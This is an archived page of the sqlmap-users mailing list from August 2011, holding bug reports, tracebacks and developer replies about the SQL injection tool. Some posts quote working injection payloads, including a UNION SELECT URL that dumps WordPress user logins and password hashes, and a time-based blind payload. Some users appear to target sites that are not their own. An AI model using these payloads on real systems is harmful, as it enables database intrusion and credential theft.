sqlmap-users Mailing List for sqlmap (Page 82)
Brought to you by:
inquisb
You can subscribe to this list here.
2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
---|---|---|---|---|---|---|---|---|---|---|---|---|
2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
From: This L. <thi...@ho...> - 2011-08-17 21:10:11
|
sqlmap/1.0-dev (r4351) found this Place: GETParameter: id Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=155 AND SLEEP(5)--- against web application technology: Apache, PHP 5.2.8back-end DBMS: MySQL 5.0.11banner: '5.0.77' but the exploit was agonizingly slow. testing each other individual technique --technique=BEUS at default level and risk produced no positives mysqlat0r found what it terms, 'method get, with single parameter, 'numerical without comments' positive and could quickly catalog dbs and dump full tables here is an example of it's exploit url http://127.0.0.1/news/edumacation/salsandvinablals/2011/individittiual09.php?id=-666%20UNION%20ALL%20SELECT%20null,concat(0x585858535441525444554D50585858,ID,0x7C7C7C,user_login,0x7C7C7C,user_pass,0x7C7C7C,user_nicename,0x7C7C7C,user_email,0x7C7C7C,user_url,0x7C7C7C,user_registered,0x7C7C7C,user_activation_key,0x7C7C7C,user_status,0x7C7C7C,display_name,0x7C7C7C,0x585858454E4444554D50585858),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20redridinghood_OSyummy2k11.wp_users%20LIMIT%200,10& full source for mysqlat0r available here http://www.scrt.ch/en/attack/downloads/mini-mysqlat0r my previous experience has been that mysqlat0r only is able to exploit what it claims to have found about 10% of the time. it would be nice if sqlmap would continue to test the other techniques even after finding a positive, and show you a list of available positives in subsequent passes, as some are much faster, or have better features. particularly when processing a dork resultset. i have seen it ask if i want to continue after a positive, but it doesn't seem to actually attempt each of the other techniques, but just skipped to the next result set item. I'll retest that. i have been able to force it with the BEUST flags, and select the preferred one at runtime, but the UI for doing so is a little clumsy. |
From: Miroslav S. <mir...@gm...> - 2011-08-16 06:55:13
|
hi Oso. there are some cases where character validation could cause problems like the one you've noticed. i won't go into details. with the last revision (r4349) there should be a better way to handle this kind of cases. there will be 5 validation retries (incrementing time delay along the run) and if each of those retries fail last known value will be used as a final one (best solution for many reasons, including: it has the best probability to be "better" than the others, there is a great possibility - like in your case - that for some unknown reason there is a problem with the "validation" itself with the probably good value being infinitely revalidated for no reason). kr On Tue, Aug 16, 2011 at 6:11 AM, Oso Dog <oso...@ya...> wrote: > Hi there, I a new user of sqlmap and have run into a situation where sqlmap > indicates that it has found an injection point of a GET query parameter > using "Oracle AND time-based blind (heavy query - comment". I am able to use > the brute force method to enumerate the column names of a table but when I > try and do any other enumeration function, I get the following error > messages. I have used both my home and work network plus 2 different systems > and am using the most recent version from svn. > [ERROR] invalid character detected. retrying.. > [WARNING] increasing time delay to 2 seconds (due to invalid char) > I have let it run over night with the delay going up to 300 seconds but > still no luck. I am trying to figure out exactly what is causing this error > condition and if there is anything I can do on my end to resolve it? I have > also tried using the --text-only parameter. > thx. > O. > ------------------------------------------------------------------------------ > uberSVN's rich system and user administration capabilities and model > configuration take the hassle out of deploying and managing Subversion and > the tools developers use with it. Learn more about uberSVN and get a free > download at: http://p.sf.net/sfu/wandisco-dev2dev > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar (@stamparm) E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
From: Miroslav S. <mir...@gm...> - 2011-08-16 06:15:51
|
hi Alex. thank you for your report. find it "patched" in the latest revision (r4347). kr On Mon, Aug 15, 2011 at 3:11 AM, Alex <m3...@gm...> wrote: > [WARNING] unknown charset '{charset}'. Please report by e-mail to > sql...@li... > > from url http://pp24.biz/?mod=login > > ------------------------------------------------------------------------------ > uberSVN's rich system and user administration capabilities and model > configuration take the hassle out of deploying and managing Subversion and > the tools developers use with it. Learn more about uberSVN and get a free > download at: http://p.sf.net/sfu/wandisco-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar (@stamparm) E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
From: Miroslav S. <mir...@gm...> - 2011-08-16 06:11:59
|
hi anonymous anonymous. thank you for your report. find it fixed in the latest revision (r4346). kr 2011/8/16 anonymous anonymous <tm...@2c...>: > [00:47:49] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4345), retry > your run with the latest development version from the Subversion repository. > If the exception persists, please send by e-mail to > sql...@li... the following text and any information > required to reproduce the bug. The developers will try to reproduce the bug, > fix it accordingly and get back to you. > sqlmap version: 1.0-dev (r4345) > Python version: 2.6.6 > Operating system: posix > Command line: ./sqlmap.py -u > ************************************************************************************* > --threads 50 -D **** -T ******* --columns > Technique: ERROR > Back-end DBMS: MySQL (fingerprinted) > Traceback (most recent call last): > File "./sqlmap.py", line 86, in main > start() > File "/root/sqlmap/lib/controller/controller.py", line 561, in start > action() > File "/root/sqlmap/lib/controller/action.py", line 100, in action > conf.dumper.dbTableColumns(conf.dbmsHandler.getColumns()) > File "/root/sqlmap/lib/core/dump.py", line 214, in dbTableColumns > maxlength1 = max(maxlength1, len(column)) > TypeError: object of type 'NoneType' has no len() > [*] shutting down at 00:47:49 > ------------------------------------------------------------------------------ > uberSVN's rich system and user administration capabilities and model > configuration take the hassle out of deploying and managing Subversion and > the tools developers use with it. Learn more about uberSVN and get a free > download at: http://p.sf.net/sfu/wandisco-dev2dev > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar (@stamparm) E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
From: Oso D. <oso...@ya...> - 2011-08-16 04:14:33
|
Hi there, I a new user of sqlmap and have run into a situation where sqlmap indicates that it has found an injection point of a GET query parameter using "Oracle AND time-based blind (heavy query - comment". I am able to use the brute force method to enumerate the column names of a table but when I try and do any other enumeration function, I get the following error messages. I have used both my home and work network plus 2 different systems and am using the most recent version from svn. [ERROR] invalid character detected. retrying.. [WARNING] increasing time delay to 2 seconds (due to invalid char) I have let it run over night with the delay going up to 300 seconds but still no luck. I am trying to figure out exactly what is causing this error condition and if there is anything I can do on my end to resolve it? I have also tried using the --text-only parameter. thx. O. |
From: anonymous a. <tm...@2c...> - 2011-08-15 22:50:44
|
<div><div>[00:47:49] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4345), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.</div><div>sqlmap version: 1.0-dev (r4345)</div><div>Python version: 2.6.6</div><div>Operating system: posix</div><div>Command line: ./sqlmap.py -u ************************************************************************************* --threads 50 -D **** -T ******* --columns</div><div>Technique: ERROR</div><div>Back-end DBMS: MySQL (fingerprinted)</div><div>Traceback (most recent call last):</div><div> File "./sqlmap.py", line 86, in main</div><div> start()</div><div> File "/root/sqlmap/lib/controller/controller.py", line 561, in start</div><div> action()</div><div> File "/root/sqlmap/lib/controller/action.py", line 100, in action</div><div> conf.dumper.dbTableColumns(conf.dbmsHandler.getColumns())</div><div> File "/root/sqlmap/lib/core/dump.py", line 214, in dbTableColumns</div><div> maxlength1 = max(maxlength1, len(column))</div><div>TypeError: object of type 'NoneType' has no len()</div><div>[*] shutting down at 00:47:49</div></div> |
From: Alex <m3...@gm...> - 2011-08-15 01:11:14
|
[WARNING] unknown charset '{charset}'. Please report by e-mail to sql...@li... from url http://pp24.biz/?mod=login |
From: Miroslav S. <mir...@gm...> - 2011-08-12 12:29:24
|
hi. i've done some internal tests against r4000, r4300 & r4333. there is virtually no difference between r4300 and r4333 in terms of speed and they are significantly faster than r4000. could somebody give a full command line used and technique involved (i've tested against partial/full UNION and ERROR) that is causing "slow down"? kr On Thu, Aug 11, 2011 at 11:57 PM, <and...@gm...> wrote: > Sirs, > > I have checkout the last commit and made some test. > > It seems that this release is slower then previous one. > > I'm dumping date from databases. The behavior is the same for mssql and mysql. > > Andre Silva > > > -----Original Message----- > From: Miroslav Stampar <mir...@gm...> > Date: Thu, 11 Aug 2011 22:11:30 > To: Liran Mimoni<rea...@gm...> > Cc: <sql...@li...> > Subject: Re: [sqlmap-users] r4333 - sqlmap tests are now slower? > > ------------------------------------------------------------------------------ > Get a FREE DOWNLOAD! and learn more about uberSVN rich system, > user administration capabilities and model configuration. Take > the hassle out of deploying and managing Subversion and the > tools developers use with it. > http://p.sf.net/sfu/wandisco-dev2dev > > -- Miroslav Stampar (@stamparm) E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
From: <and...@gm...> - 2011-08-11 21:56:01
|
Sirs, I have checkout the last commit and made some test. It seems that this release is slower then previous one. I'm dumping date from databases. The behavior is the same for mssql and mysql. Andre Silva -----Original Message----- From: Miroslav Stampar <mir...@gm...> Date: Thu, 11 Aug 2011 22:11:30 To: Liran Mimoni<rea...@gm...> Cc: <sql...@li...> Subject: Re: [sqlmap-users] r4333 - sqlmap tests are now slower? ------------------------------------------------------------------------------ Get a FREE DOWNLOAD! and learn more about uberSVN rich system, user administration capabilities and model configuration. Take the hassle out of deploying and managing Subversion and the tools developers use with it. http://p.sf.net/sfu/wandisco-dev2dev |
From: Vladimir R. <rut...@gm...> - 2011-08-11 20:47:54
|
Hello, Miroslav! On Ср., 2011-08-10 at 10:48 +0200, Miroslav Stampar wrote: > Hi Vladimir. > > Thank you for your report. We'll so something about it. In the mean > time you can experiment with --technique (other than U) or > --start/--stop. > > If there is no alternative please contact me privately and i'll make > you a temporary patch. > > That idea with end char is great. We'll try to use it in detection > phase. > > Kr > > On 9.8.2011. 22:34, "Vladimir Rutsky" <rut...@gm...> > wrote: > Thank you for fast reply! I managed to get required information without using of sqlmap, so temporary patch is not needed, let my letter will be feature request for future versions of sqlmap. I my case using --start/--stop helped a little --- when I provide such options looks like sqlmap obtains requested rows one by one, so limit in PHP script for 10 items per page is never reached. But anyway sqlmap incorrectly obtains not more than 10 columns from table, so I can't get full table dump with it. Below I consider that we using UNION-SELECT-technique. 1. How about along with each obtained item from database through sql-injection also pass checksum for that value. UNION-SELECT-technique SQL-injection by it's nature gives ability to obtain values from database as text --- because HTTP transfers text, so you can apply any checksum to that text. I suggest to request value through sql-injection as follows (for MySQL): UNION SELECT CONCAT( "start tag", CAST(xxx AS CHAR), MD5(CAST(xxx AS CHAR)), "end tag") Then if obtained result contains text with valid checksum between start and end tags, then output is definitely not corrupted or truncated. 2. I saw that in MySQL queries you use a lot of "CONCAT(CHAR(58,46,121,118,58), ..." constructions. You can reduce their length by using hexadecimal presentations of strings in MySQL, like "CONCAT(0x3a2e79763a, ...". 3. I looked through xml/payloads.xml and didn't find prefixes for simple WHERE clause inclusions on PHP-powered host with enabled magic_quotes_gpc [1]. Consider example (PHP and MySQL): mysql_query("SELECT a,b,c FROM table WHERE name='" . $_GET["id"] . "'"); When single quote is passed through GET it's being escaped: "'" -> "\'". To workaround such escaping is enough to use "\'" prefix in sqlmap: "\'" -> "\\'". I suggest to use "\'" prefixes in sqlmap along with "'" prefixes. [1] http://php.net/manual/en/security.magicquotes.php 4. I tried to get familiar with source code of sqlmap, but despite it is written in Python it is quite hard to read and understand without learning main idea and methods that are used in sqlmap. Is there any developer documentation? Doing SQL-injection is an art in some sense. So sqlmap will never be able to automatically hack every vulnerable site (but will help in most of them). I think sqlmap should provide extendable and easy to use library, divided on several independent modules, like module for testing url for vulnerabilities, module for fetching data from foreign database when "vector" for obtaining single item from database is found, and so on. P.S. I'm new to sqlmap and probably some of my thoughts described below don't make sense in context of this project, or some of my ideas are already implemented. Hope this letter will be useful. Best wishes, Vladimir Rutsky |
From: Miroslav S. <mir...@gm...> - 2011-08-11 20:18:56
|
Hi. Basically sqlmap should not have problems with these. There are two possible causes for symptoms like you've noticed. First one is incompatibility of the charset encoding used by your console and the second one is the incompatibility of the backend data charset with the web page charset. Three questions. What's the injection technique used, what's the charset of the injectable web page and have you tried opening of the dumped CSV file with text editor? On 11.8.2011. 14:20, "root" <ro...@cn...> wrote: > hi > when i use sqlmap to check chinese website,dump the data.found sqlmap can't recognition of Chinese characters.like this > > > 2011-08-11 > > > > thks&Best Regards > robert |
From: Miroslav S. <mir...@gm...> - 2011-08-11 20:11:38
|
Hi. We've added one new generic union test (with %00 comment) as a default test. Maybe that's the reason of the 'slow' experience? Kr On 11.8.2011. 01:25, "Liran Mimoni" <rea...@gm...> wrote: > I think that the tests that sqlmap is running on revision r4332 and r4333 > are much slower than older builds. > > is it just me? (hosts i'm testing are ping 20ms to me) |
From: Liran M. <rea...@gm...> - 2011-08-10 23:25:02
|
I think that the tests that sqlmap is running on revision r4332 and r4333 are much slower than older builds. is it just me? (hosts i'm testing are ping 20ms to me) |
From: Bernardo D. A. G. <ber...@gm...> - 2011-08-10 09:31:28
|
The generic tests are always tested for. Regardless of the DBMS identified or --dbms switch provided. Bernardo 2011/8/10 Andres Tarascó Acuña <ata...@gm...>: > Hi, > Is the "--dbms=db2" flag still unsupported ? I have tried it however > the checked payloads were: > [20:43:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' > [20:44:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' > [20:44:13] [INFO] testing 'Generic UNION query with Microsoft Access (%00) > comment (NULL) - 1 to 10 columns' > Im not sure if this is currently a bug or just the expected result :? > Thanks. > Andres > 2011/7/6 Bernardo Damele A. G. <ber...@gm...> >> >> Hi, >> >> Update on IBM DB2 support: payload for time-based has been added[1] >> last week as well as support for direct connection (-d switch). >> >> [1] https://twitter.com/#!/sqlmap/status/85659702565937152 >> >> >> On 25 June 2011 11:04, Bernardo Damele A. G. <ber...@gm...> >> wrote: >> > Hi, >> > >> > The long awaited IBM DB2 support has been implemented in sqlmap. The >> > patch has been provided by Sebastian Bittig of r-tec IT Systeme GmbH >> > and merged in sqlmap repository after some tweaking by us. It is very >> > stable for both DB2 8.x and 9.x branches. >> > The patch includes support to fingerprint and enumerate data on IBM >> > DB2 via boolean-based blind SQL injection and UNION query SQL >> > injection. Hopefully, soon someone will come up with a payload for >> > time-based and error-based techniques too. Support for direct >> > connection to the DBMS (-d switch) will be implemented soon as well. >> > >> > Thank you Sebastian and the rest of the team at r-tec for your patch >> > and support! >> > >> > Sample run against an IBM DB2 9.7 test environment: >> > --8<-- >> > $ python sqlmap.py -u http://TARGET/page.php?id=1 -f -b --current-user >> > >> > sqlmap/1.0-dev (r4182) - automatic SQL injection and database >> > takeover tool >> > http://sqlmap.sourceforge.net >> > >> > [!] legal disclaimer: usage of sqlmap for attacking targets without >> > prior mutual consent is illegal. It is the end user's responsibility >> > to obey all applicable local, state and federal laws. Authors assume >> > no liability and are not responsible for any misuse or damage caused >> > by this program >> > >> > [*] starting at 10:56:21 >> > >> > [10:56:21] [INFO] using >> > >> > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/TARGET/session' >> > as session file >> > [10:56:21] [INFO] testing connection to the target url >> > [10:56:23] [INFO] heuristics detected web page charset 'ascii' >> > [10:56:23] [INFO] testing if the url is stable, wait a few seconds >> > [10:56:25] [INFO] url is stable >> > [10:56:25] [INFO] testing if GET parameter 'id' is dynamic >> > [10:56:26] [INFO] confirming that GET parameter 'id' is dynamic >> > [10:56:26] [INFO] GET parameter 'id' is dynamic >> > [10:56:27] [INFO] heuristic test shows that GET parameter 'id' might >> > be injectable (possible DBMS: DB2) >> > [10:56:27] [INFO] testing sql injection on GET parameter 'id' >> > [10:56:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING >> > clause' >> > [10:56:32] [INFO] GET parameter 'id' is 'AND boolean-based blind - >> > WHERE or HAVING clause' injectable >> > parsed error message(s) showed that the back-end DBMS could be DB2. Do >> > you want to skip test payloads specific for other DBMSes? [Y/n] >> > [10:56:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' >> > [10:56:49] [INFO] target url appears to be UNION injectable with 1 >> > columns >> > [10:56:51] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - >> > 1 to 10 columns' injectable >> > GET parameter 'id' is vulnerable. Do you want to keep testing the >> > others? [y/N] >> > sqlmap identified the following injection points with a total of 21 >> > HTTP(s) requests: >> > --- >> > Place: GET >> > Parameter: id >> > Type: boolean-based blind >> > Title: AND boolean-based blind - WHERE or HAVING clause >> > Payload: id=1' AND 7118=7118 AND 'Skhh'='Skhh >> > >> > Type: UNION query >> > Title: Generic UNION query (NULL) - 1 to 10 columns >> > Payload: id=1' UNION ALL SELECT >> > >> > CHR(58)||CHR(110)||CHR(114)||CHR(114)||CHR(58)||CHR(90)||CHR(103)||CHR(65)||CHR(88)||CHR(66)||CHR(109)||CHR(69)||CHR(74)||CHR(77)||CHR(117)||CHR(58)||CHR(101)||CHR(113)||CHR(108)||CHR(58) >> > FROM SYSIBM.SYSDUMMY1-- AND 'QrLM'='QrLM >> > --- >> > >> > [10:58:58] [INFO] testing IBM DB2 >> > [10:58:59] [INFO] confirming IBM DB2 >> > [10:59:12] [INFO] the back-end DBMS is IBM DB2 >> > web server operating system: Windows >> > web application technology: PHP 5.3.5, Apache 2.2.17 >> > back-end DBMS: active fingerprint: IBM DB2 9.7 >> > html error message fingerprint: DB2 >> > [10:59:12] [INFO] fetching banner >> > banner: 'DB2 v9.7.400.501' >> > >> > [10:59:13] [INFO] fetching current user >> > current user: 'TEST' >> > --8<-- >> > >> > Bernardo >> > >> > >> > -- >> > Bernardo Damele A. G. >> > >> > E-mail / Jabber: bernardo.damele (at) gmail.com >> > Mobile: +447788962949 (UK 07788962949) >> > PGP Key ID: Unavailable >> > >> >> >> >> -- >> Bernardo Damele A. G. >> >> E-mail / Jabber: bernardo.damele (at) gmail.com >> Mobile: +447788962949 (UK 07788962949) >> PGP Key ID: Unavailable >> >> >> ------------------------------------------------------------------------------ >> All of the data generated in your IT infrastructure is seriously valuable. >> Why? It contains a definitive record of application performance, security >> threats, fraudulent activity, and more. Splunk takes this data and makes >> sense of it. IT sense. And common sense. >> http://p.sf.net/sfu/splunk-d2d-c2 >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable |
From: Andres T. A. <ata...@gm...> - 2011-08-10 09:30:01
|
Hi, Is the "--dbms=db2" flag still unsupported ? I have tried it however the checked payloads were: [20:43:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [20:44:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [20:44:13] [INFO] testing 'Generic UNION query with Microsoft Access (%00) comment (NULL) - 1 to 10 columns' Im not sure if this is currently a bug or just the expected result :? Thanks. Andres 2011/7/6 Bernardo Damele A. G. <ber...@gm...> > Hi, > > Update on IBM DB2 support: payload for time-based has been added[1] > last week as well as support for direct connection (-d switch). > > [1] https://twitter.com/#!/sqlmap/status/85659702565937152 > > > On 25 June 2011 11:04, Bernardo Damele A. G. <ber...@gm...> > wrote: > > Hi, > > > > The long awaited IBM DB2 support has been implemented in sqlmap. The > > patch has been provided by Sebastian Bittig of r-tec IT Systeme GmbH > > and merged in sqlmap repository after some tweaking by us. It is very > > stable for both DB2 8.x and 9.x branches. > > The patch includes support to fingerprint and enumerate data on IBM > > DB2 via boolean-based blind SQL injection and UNION query SQL > > injection. Hopefully, soon someone will come up with a payload for > > time-based and error-based techniques too. Support for direct > > connection to the DBMS (-d switch) will be implemented soon as well. > > > > Thank you Sebastian and the rest of the team at r-tec for your patch > > and support! > > > > Sample run against an IBM DB2 9.7 test environment: > > --8<-- > > $ python sqlmap.py -u http://TARGET/page.php?id=1 -f -b --current-user > > > > sqlmap/1.0-dev (r4182) - automatic SQL injection and database takeover > tool > > http://sqlmap.sourceforge.net > > > > [!] legal disclaimer: usage of sqlmap for attacking targets without > > prior mutual consent is illegal. It is the end user's responsibility > > to obey all applicable local, state and federal laws. Authors assume > > no liability and are not responsible for any misuse or damage caused > > by this program > > > > [*] starting at 10:56:21 > > > > [10:56:21] [INFO] using > > > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/TARGET/session' > > as session file > > [10:56:21] [INFO] testing connection to the target url > > [10:56:23] [INFO] heuristics detected web page charset 'ascii' > > [10:56:23] [INFO] testing if the url is stable, wait a few seconds > > [10:56:25] [INFO] url is stable > > [10:56:25] [INFO] testing if GET parameter 'id' is dynamic > > [10:56:26] [INFO] confirming that GET parameter 'id' is dynamic > > [10:56:26] [INFO] GET parameter 'id' is dynamic > > [10:56:27] [INFO] heuristic test shows that GET parameter 'id' might > > be injectable (possible DBMS: DB2) > > [10:56:27] [INFO] testing sql injection on GET parameter 'id' > > [10:56:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING > clause' > > [10:56:32] [INFO] GET parameter 'id' is 'AND boolean-based blind - > > WHERE or HAVING clause' injectable > > parsed error message(s) showed that the back-end DBMS could be DB2. Do > > you want to skip test payloads specific for other DBMSes? [Y/n] > > [10:56:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' > > [10:56:49] [INFO] target url appears to be UNION injectable with 1 > columns > > [10:56:51] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - > > 1 to 10 columns' injectable > > GET parameter 'id' is vulnerable. Do you want to keep testing the others? > [y/N] > > sqlmap identified the following injection points with a total of 21 > > HTTP(s) requests: > > --- > > Place: GET > > Parameter: id > > Type: boolean-based blind > > Title: AND boolean-based blind - WHERE or HAVING clause > > Payload: id=1' AND 7118=7118 AND 'Skhh'='Skhh > > > > Type: UNION query > > Title: Generic UNION query (NULL) - 1 to 10 columns > > Payload: id=1' UNION ALL SELECT > > > CHR(58)||CHR(110)||CHR(114)||CHR(114)||CHR(58)||CHR(90)||CHR(103)||CHR(65)||CHR(88)||CHR(66)||CHR(109)||CHR(69)||CHR(74)||CHR(77)||CHR(117)||CHR(58)||CHR(101)||CHR(113)||CHR(108)||CHR(58) > > FROM SYSIBM.SYSDUMMY1-- AND 'QrLM'='QrLM > > --- > > > > [10:58:58] [INFO] testing IBM DB2 > > [10:58:59] [INFO] confirming IBM DB2 > > [10:59:12] [INFO] the back-end DBMS is IBM DB2 > > web server operating system: Windows > > web application technology: PHP 5.3.5, Apache 2.2.17 > > back-end DBMS: active fingerprint: IBM DB2 9.7 > > html error message fingerprint: DB2 > > [10:59:12] [INFO] fetching banner > > banner: 'DB2 v9.7.400.501' > > > > [10:59:13] [INFO] fetching current user > > current user: 'TEST' > > --8<-- > > > > Bernardo > > > > > > -- > > Bernardo Damele A. G. > > > > E-mail / Jabber: bernardo.damele (at) gmail.com > > Mobile: +447788962949 (UK 07788962949) > > PGP Key ID: Unavailable > > > > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) > PGP Key ID: Unavailable > > > ------------------------------------------------------------------------------ > All of the data generated in your IT infrastructure is seriously valuable. > Why? It contains a definitive record of application performance, security > threats, fraudulent activity, and more. Splunk takes this data and makes > sense of it. IT sense. And common sense. > http://p.sf.net/sfu/splunk-d2d-c2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
From: Miroslav S. <mir...@gm...> - 2011-08-10 09:17:28
|
Hi Vladimir. Thank you for your report. We'll so something about it. In the mean time you can experiment with --technique (other than U) or --start/--stop. If there is no alternative please contact me privately and i'll make you a temporary patch. That idea with end char is great. We'll try to use it in detection phase. Kr On 9.8.2011. 22:34, "Vladimir Rutsky" <rut...@gm...> wrote: |
From: Vladimir R. <rut...@gm...> - 2011-08-09 20:34:10
|
Hello! Consider following example of vulnerability. Server has PHP and MySQL 5.X. URL http://example.com/list.php?filter=text outputs list of items that match filter and is vulnerable to following SQL injection: http://example.com/list.php?filter=' UNION SELECT 1,2,3 -- This will show one row with some values 1, 2 and 3. sqlmap works with such URL when queried in following way: $ ./sqlmap.py -u http://example.com/list.php?filter=text \ -p filter --prefix "' " --suffix ' -- ' --tables -D db --- will output list of table in `db' database. The problem is that vulnerable list.php script limits number of outputted items --- it always show only first 10 items omitting others on PHP level (without using MySQL LIMIT clause), so sqlmap incorrectly detects number of columns, number of rows etc --- always limiting number of items to 10. I looked in documentation and didn't found any options for splitting enumeration requests on bunch of requests limited by some value of outputted items (e.g. query all table rows selecting by 10 rows at single query). Can you add such options or tell me how can I achieve my goal with current version of sqlmap (I'm using trunk version)? Also I want to propose checking if all of requested items was received by adding extra UNION SELECT at end with some end mark and checking is that end mark is received. I don't know details of sqlmap implementation so not sure is my proposition is correct. Thanks in advance, Vladimir Rutsky |
From: Miroslav S. <mir...@gm...> - 2011-08-09 14:14:19
|
hi John. thank you for your report. find it fixed in the latest commit. kr On Mon, Aug 8, 2011 at 8:46 AM, John Cobb <jo...@no...> wrote: > [23:07:56] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4332), retry > your run with the latest development version from the Subversion repository. > If the exception persists, please send by e-mail to > sql...@li... the following text and any information > required to reproduce the bug. The developers will try to reproduce the bug, > fix it accordingly and get back to you. > > sqlmap version: 1.0-dev (r4332) > > Python version: 2.7.1+ > > Operating system: posix > > Command line: ./sqlmap.py --tor --user-agent=PenTest --threads 4 --users > --passwords --privileges -u *********** > > Technique: TIME > > Back-end DBMS: MySQL (fingerprinted) > > Traceback (most recent call last): > > File "./sqlmap.py", line 86, in main > > start() > > File "/opt/sqlmap/lib/controller/controller.py", line 561, in start > > action() > > File "/opt/sqlmap/lib/controller/action.py", line 77, in action > > conf.dbmsHandler.getPasswordHashes(), "password hash") > > File "/opt/sqlmap/plugins/generic/enumeration.py", line 287, in > getPasswordHashes > > for user, password in value: > > ValueError: need more than 1 value to unpack > > > > [*] shutting down at 23:07:56 > > ------------------------------------------------------------------------------ > BlackBerry® DevCon Americas, Oct. 18-20, San Francisco, CA > The must-attend event for mobile developers. Connect with experts. > Get tools for creating Super Apps. See the latest technologies. > Sessions, hands-on labs, demos & much more. Register early & save! > http://p.sf.net/sfu/rim-blackberry-1 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar (@stamparm) E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
From: machak m. <mma...@gm...> - 2011-08-09 13:16:43
|
